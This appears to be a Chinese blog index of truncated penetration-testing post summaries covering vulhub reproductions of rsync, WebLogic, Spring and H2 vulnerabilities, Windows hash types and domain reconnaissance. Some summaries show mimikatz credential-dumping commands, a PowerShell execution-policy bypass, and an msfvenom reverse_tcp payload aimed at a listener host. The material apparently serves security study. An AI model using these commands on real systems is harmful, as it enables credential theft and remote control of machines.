kalixcn

摘要： rsync 未授权访问漏洞 rsync是Linux下一款数据备份工具，支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口，如果目标开启了rsync服务，并且没有配置ACL或访问密码，将可以读写目标服务器文件。 漏洞测试 cd vulhub/rsync/commo 阅读全文

摘要： Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628） Oracle 2018年4月补丁中，修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞（CVE-2018-2628），该漏洞通过t3协议触发 阅读全文

摘要： Spring Data Rest 远程命令执行漏洞（CVE-2017-8046） Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中，path的值被传入setValue，导致执行了SpEL 阅读全文

摘要： Spring WebFlow 远程代码执行漏洞（CVE-2017-4971） Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，如果我们控制了数据绑定时的field，将导致一个SpEL表达 阅读全文

摘要： Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977） Spring Security OAuth是为Spring框架提供安全认证支持的一个模块。在其使用whitelabel views来处理错误时，由于使用了Springs Expression Languag 阅读全文

摘要： H2 Database Console未授权访问 H2 database是一款java内存数据库，多用于单元测试。H2 database自带一个web管理页面，在Spring开发中，如果我们设置如下选项，即可允许外部用户访问WEB管理页面，且没有鉴权； spring.h2.console.enabl 阅读全文

摘要： 抓hash方法 mimikatz privilege::debug token::whoami token::elevate lsadump::sam privilege::debug sekurlsa::logonpasswords ps脚本 powershell -exec bypass Imp 阅读全文

摘要： Windows Hash 分类 LM Hash NTLM Hash Net-NTLM Hash Windows Hash简介 window系统内部不保存用户的明文密码，只保存密码的Hash值 本机用户的密码Hash是存放SAM文件中，文件路径为：C:\Windows\System32\config\ 阅读全文

摘要： 判断是否存在域 1. 网卡信息查询 ipconfig /all 查看DNS后缀搜索列表 2. 查询主机信息 systeminfo 查看域，如果"域的值为WORKGROUP"，表示当前服务器不在域内。 3. 查询当前登录域及登录用户信息 net config workstation 4. 查看时间服务 阅读全文

摘要： 使用Cobalt Strike生成的会话和MSF相互连接，在内网渗透中，可以方便后期的渗透。 一、Cobalt Strike连接MSF会话 1. 上线msf会话 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport 阅读全文